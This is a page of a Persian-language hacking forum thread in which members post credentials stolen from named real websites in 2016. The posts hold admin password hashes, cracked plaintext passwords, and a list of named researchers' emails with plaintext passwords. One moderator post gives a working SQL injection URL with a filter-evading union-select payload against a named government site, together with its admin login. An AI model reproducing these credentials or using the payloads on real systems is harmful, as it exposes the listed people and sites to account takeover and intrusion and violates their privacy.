پرش به


تصویر

دیتابیس سایت های مورد نفوذ قرار گرفته (خارجی)

اختصاصی

 • لطفا وارد حساب کاربری خود شوید تا بتوانید پاسخ دهید
217 پاسخ برای این موضوع

#161 ارسالی 28 سپتامبر 2016 - 07:55

ArminTanha
+298
  OFFLINE
  تاریخ عضویت :
  04 سپتامبر 2016
 • %70███████▒▒▒
 • Anonymous
 • 71 ارسال
  Last Visit اكتبر 20 2016 09:20
 • Country :
 • Gender : Male
 • Location : Deutschland
 • Name : Armin
+--------+------------------+--------+---------+----------+----------------------------------+---------------------+---------------------+---------------------+
| UserId | Name           | Status | Group | Username | Password                       | Last_Login        | Date_Update       | Date_Create       |
+--------+------------------+--------+---------+----------+----------------------------------+---------------------+---------------------+---------------------+
| 1    | Jad            | enable | admin | admin  | f11685bf0deb787d203726a519101c9c | 2015-04-16 03:52:11 | 2015-04-16 03:46:50 | 2006-11-27 13:06:05 |
| 2    | PwnySec was here | enable | user  | user   | 5e80283d8f6daf14643ff456e9a4a3eb | 2012-07-02 12:17:43 | 2012-07-02 12:19:02 | 2006-03-24 22:54:01 |
| 3    | admin1         | enable | user  | admin1 | sfo/2011                       | 0000-00-00 00:00:00 | 0000-00-00 00:00:00 | 0000-00-00 00:00:00 |
+--------+------------------+--------+---------+----------+----------------------------------+---------------------+---------------------+---------------------+
www.sfo.co.th
http://www.sfo.co.th/admin/index.php

AT-Plus


#162 ارسالی 28 سپتامبر 2016 - 07:55

ArminTanha
+298
  OFFLINE
  تاریخ عضویت :
  04 سپتامبر 2016
 • %70███████▒▒▒
 • Anonymous
 • 71 ارسال
  Last Visit اكتبر 20 2016 09:20
 • Country :
 • Gender : Male
 • Location : Deutschland
 • Name : Armin
+----+--------------------------------+----------------------------------+-----------------------+
| id | email                        | password                       | forgotten_pasword_ref |
+----+--------------------------------+----------------------------------+-----------------------+
| 1| [email protected] | dbee776b8a7a7ef429580b37c8a22a9c | <blank>             |
| 2| [email protected]                   | 9f056e2e5e7c5b778d719cb6358a2b05 | <blank>             |
+----+--------------------------------+----------------------------------+-----------------------+
www.crom.co.uk
http://www.crom.co.uk/login.php

AT-Plus


#163 ارسالی 28 سپتامبر 2016 - 01:22

Ormazd
+1,721
  OFFLINE
  تاریخ عضویت :
  24 دسامبر 2015
 • ORMAZD
 • Super Moderator
 • 294 ارسال
  Last Visit اوت 24 2017 05:41
 • Country :
 • Gender : Male

تارگت :

http://www.wbtdcc.gov.in

لینک اینجکت :

http://www.wbtdcc.gov.in/download.php?down_id=-77%20/*!50000union*//*!50000select*/1,2,/*!50000grOup_conCat(username,0x3a,password)*/,4/*!50000from*/admin_user--+

یوزر پس :

admin1:jhb56*&H$#

دوستانی که اینجا پست میذارن توجه کنند که لینک اینجکت رو حتما بذارن


به خیالشون که این تاج سرشونه تا همیشه
یادشون رفته که اون شاه که به صد مهره نمی باخت
تاج رو از سرش تو میدون لشکر پیاده انداخت
اونکه مارو بازی میده
اونیکه مهره رو چیده
اونیکه نه شاه نه سرباز
نه سیاه...........نه سفیده
از پس پرده نگاه کن


#164 ارسالی 28 سپتامبر 2016 - 03:32

ArminTanha
+298
  OFFLINE
  تاریخ عضویت :
  04 سپتامبر 2016
 • %70███████▒▒▒
 • Anonymous
 • 71 ارسال
  Last Visit اكتبر 20 2016 09:20
 • Country :
 • Gender : Male
 • Location : Deutschland
 • Name : Armin
neutralposture.com
user:john    |pass: b0a43e60f21feb841a34958e147af087
user:OddThomas |pass: 710ff2fc5b0eeb581e299649c00fcee8

Hash Crackd

B0A43E60F21FEB841A34958E147AF087 : hichem

ویرایش شده توسط ArminTanha 28 سپتامبر 2016 - 03:36 .

AT-Plus


#165 ارسالی 28 سپتامبر 2016 - 03:46

ArminTanha
+298
  OFFLINE
  تاریخ عضویت :
  04 سپتامبر 2016
 • %70███████▒▒▒
 • Anonymous
 • 71 ارسال
  Last Visit اكتبر 20 2016 09:20
 • Country :
 • Gender : Male
 • Location : Deutschland
 • Name : Armin
+----+------------------+----------------------------------+-------------+-----------------------+-------------+--------------+---------------+---------------------+-----------------------------------------------+
| ID | user_url       | user_pass                      | user_login| user_email          | user_status | display_name | user_nicename | user_registered   | user_activation_key                         |
+----+------------------+----------------------------------+-------------+-----------------------+-------------+--------------+---------------+---------------------+-----------------------------------------------+
| 1| www.micronor.com | af3bda281b52a26f7d23f4e81d234912 | micronorinc | [email protected] | 0         | micronorinc| micronorinc | 2016-08-01 09:22:00 | 1444806278:$P$Bd9l2/J7V00SNzBnK9gyfOUZaiOifx1 |
+----+------------------+----------------------------------+-------------+-----------------------+-------------+--------------+---------------+---------------------+-----------------------------------------------+

www.micronor.com

AT-Plus


#166 ارسالی 28 سپتامبر 2016 - 03:52

ArminTanha
+298
  OFFLINE
  تاریخ عضویت :
  04 سپتامبر 2016
 • %70███████▒▒▒
 • Anonymous
 • 71 ارسال
  Last Visit اكتبر 20 2016 09:20
 • Country :
 • Gender : Male
 • Location : Deutschland
 • Name : Armin
email,date,country,username,password,institution
[email protected],2005-12-14,<blank>,test,test,test
[email protected],2006-01-03,france,linck thierry,th!err!,inra
[email protected],2006-01-03,france,allaire gilles,/1947/17,inra
[email protected],2006-01-03,France,Wallet Frédéric,sinergi,INRA
[email protected],2006-01-03,Switzerland,Erik Thévenod-Mottet,bravard,AGRIDEA Lausanne
[email protected],2005-12-23,Switzerland,Thévenod-Mottet Erik,surchoix,AGRIDEA Lausanne
[email protected],2006-01-03,FRANCE,AMBLARD Corinne,madu28,ENITA Clermont
[email protected],2006-01-03,Italia,Belletti Giovanni,viareg,Università di Firenze
[email protected],2006-01-03,france,cheyns emmanuelle,emma70,cirad
[email protected],2006-01-03,brasil,claire cerdan,manioc3,cirad
[email protected],2006-01-04,France,Vivensang julien,junior,INRA
[email protected],2006-01-04,Italy,marescotti,fbaresi,DSE-Florence
[email protected],2006-01-05,UK,Tregear Angela,Talisker1,University of Edinburgh
[email protected],2006-01-05,Suisse,Brand,brand,AGRIDEA
[email protected],2006-01-16,Italy,cernicchiaro sabrina,progettosin,Parma University
[email protected],2006-01-19,Italy,kiara,unipr,Università degli Studi di Parma
[email protected],2006-01-29,France,Casabianca François,corsica,INRA
[email protected],2006-02-20,France,Sylvander,basil1,INRA-SAD
[email protected],2006-03-30,France,Franch,sinerginra,INRA
[email protected],2006-05-10,Italy,Tunia Burgassi,TuniaeCiccino,DSE Florence
[email protected],2006-05-23,NL,hielke,cheese6,Wageningen University
[email protected],2006-05-30,Italy,elisabettamanco,billaegudo,University of Florence
[email protected],2006-06-01,France,Sautier,sinercirad,CIRAD
[email protected],2006-09-26,SWITZERLAND,Marguerite Paus,bravard,AGRIDEA
www.origin-food.org

AT-Plus


#167 ارسالی 28 سپتامبر 2016 - 03:59

ArminTanha
+298
  OFFLINE
  تاریخ عضویت :
  04 سپتامبر 2016
 • %70███████▒▒▒
 • Anonymous
 • 71 ارسال
  Last Visit اكتبر 20 2016 09:20
 • Country :
 • Gender : Male
 • Location : Deutschland
 • Name : Armin
Database: russians_russians
Table: admin
[3 entries]
+----+----------------------------------+-----------+---------------+----------------------------------+
| id | pass                           | user    | username    | password                       |
+----+----------------------------------+-----------+---------------+----------------------------------+
| 1| <blank>                        | <blank> | admin       | 8efecb1a064982729432e2dad50ffc95 |
| 2| <blank>                        | <blank> | administrator | 3f0eec01a4c1eac507806b21257312d9 |
| 4| 21232f297a57a5a743894a0e4a801fc3 | admin2013 | admin2013   | 21232f297a57a5a743894a0e4a801fc3 |
+----+----------------------------------+-----------+---------------+----------------------------------+

www.russianspares.com/

Hash Cracked

21232F297A57A5A743894A0E4A801FC3 : admin

AT-Plus


#168 ارسالی 28 سپتامبر 2016 - 04:07

ArminTanha
+298
  OFFLINE
  تاریخ عضویت :
  04 سپتامبر 2016
 • %70███████▒▒▒
 • Anonymous
 • 71 ارسال
  Last Visit اكتبر 20 2016 09:20
 • Country :
 • Gender : Male
 • Location : Deutschland
 • Name : Armin
Database: studioandrewhoward_com_-_idioms
Table: cl_admin
[1 entry]
+----+------+--------+
| id | pass | user |
+----+------+--------+
| 1| 123| admin|
+----+------+--------+
www.studioandrewhoward.com

جدول paypal سایت


AT-Plus


#169 ارسالی 28 سپتامبر 2016 - 04:12

ArminTanha
+298
  OFFLINE
  تاریخ عضویت :
  04 سپتامبر 2016
 • %70███████▒▒▒
 • Anonymous
 • 71 ارسال
  Last Visit اكتبر 20 2016 09:20
 • Country :
 • Gender : Male
 • Location : Deutschland
 • Name : Armin
Database: wapu01_wapu01
Table: uni_users
[4 entries]
+----+---------+---------+------+---------+--------+--------+---------+---------+----------------------------------+-----------+
| id | form_id | idgroup | lang | role  | open | user | level | deleted | password                       | userfiles |
+----+---------+---------+------+---------+--------+--------+---------+---------+----------------------------------+-----------+
| 1| 0     | 1     | ita| 1     | off  | staff| w:d:l | no    | 1d71f961b8e09f87d992b1bbc7f42697 | <blank> |
| 5| 0     | 1     | ita| 1     | off  | wapu01 | w:d:l | no    | 6c1ded1ddec8387dca147f5505a28d20 | <blank> |
| 9| 0     | 1     | ita| 1     | off  | pippo| w:d:l | yes   | 0c88028bf3aa6a6a143ed846f2be1ea4 | <blank> |
| 10 | 0     | 0     | ita| <blank> | off  | pippo2 | w:d:l | yes   | 921d1164985a9c2dc7f5689c820599bd | <blank> |
+----+---------+---------+------+---------+--------+--------+---------+---------+----------------------------------+-----------+

www.wapu.it

Hash Cracked

921D1164985A9C2DC7F5689C820599BD pippo2
0C88028BF3AA6A6A143ED846F2BE1EA4 pippo
6C1DED1DDEC8387DCA147F5505A28D20 wapu01
1D71F961B8E09F87D992B1BBC7F42697 GraFik

AT-Plus


#170 ارسالی 30 سپتامبر 2016 - 03:23

  OFFLINE
  تاریخ عضویت :
  16 نوامبر 2015
 • Professional Hacker
 • Super Moderator
 • 596 ارسال
  Last Visit 3 هفته قبل
 • Slogan : SEC_RITY is not complete without U!
 • Country :
 • Gender : Male
 • Location : IN YOUR SYSTEM
 • Name : Lord Black
Database: wapu01_wapu01
Table: uni_users
[4 entries]
+----+---------+---------+------+---------+--------+--------+---------+---------+----------------------------------+-----------+
| id | form_id | idgroup | lang | role  | open | user | level | deleted | password                       | userfiles |
+----+---------+---------+------+---------+--------+--------+---------+---------+----------------------------------+-----------+
| 1| 0     | 1     | ita| 1     | off  | staff| w:d:l | no    | 1d71f961b8e09f87d992b1bbc7f42697 | <blank> |
| 5| 0     | 1     | ita| 1     | off  | wapu01 | w:d:l | no    | 6c1ded1ddec8387dca147f5505a28d20 | <blank> |
| 9| 0     | 1     | ita| 1     | off  | pippo| w:d:l | yes   | 0c88028bf3aa6a6a143ed846f2be1ea4 | <blank> |
| 10 | 0     | 0     | ita| <blank> | off  | pippo2 | w:d:l | yes   | 921d1164985a9c2dc7f5689c820599bd | <blank> |
+----+---------+---------+------+---------+--------+--------+---------+---------+----------------------------------+-----------+

www.wapu.it

Hash Cracked

921D1164985A9C2DC7F5689C820599BD pippo2
0C88028BF3AA6A6A143ED846F2BE1EA4 pippo
6C1DED1DDEC8387DCA147F5505A28D20 wapu01
1D71F961B8E09F87D992B1BBC7F42697 GraFik

 

از فعالیت شما مچکریم اما قبل از فعالیت بهتر هست که ی نگاهی به قوانین تاپیک بندازین :

 

3) دیتابیسی که قرار میدین حتما اگر SQLi هستش باید حتما دستی مورد نفوذ قرار گرفته باشه و لینک صحیح نفوذ رو قرار بدین( تنها لینک آخر برای بازیابی پسورد و یوزر )

 

شما حدود دو صفحه با ابزار SQLMap یا .... نفوذ داشتین و قرار دادین ، تارگت های شما پاک نمیشن اما ازین به بعد به صورت دستی عملیات اینجکت رو انجام بدین و لینک اینجکت رو مانند خودم و دوستان قرار بدین ممنون.

درصورت ادامه (تارگت های شما پاک میشوند.)


Exploit-DB

(( AirSploit Framework Wireless Security To0l ))

GitHub :)

دیتابیس های مورد نفوذ قرار گرفته

آموزش کامل سیملینک

آپلود شل با هر نوع فرمتی

باگ های ثبت شده here & here

..:: Blackwolf_Iran ::..

------------------------------------------------------------------------------------------------------------------------------------------------------

Im Just a Security Researcher =)

image.gif


همچنین به اختصاصی نیز برچسب خورده است

0 کاربر در حال خواندن این موضوع است

0 کاربر، 0 مهمان و 0 عضو مخفی

رفتن به اول صفحه | Back To UP